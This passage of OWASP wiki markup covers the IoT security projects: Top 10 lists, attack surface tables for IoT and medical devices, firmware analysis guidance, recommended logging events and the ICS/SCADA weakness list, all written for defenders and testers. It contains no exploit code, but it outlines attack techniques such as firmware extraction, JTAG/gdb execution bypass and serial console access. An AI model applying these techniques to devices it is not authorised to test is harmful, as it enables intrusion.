* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
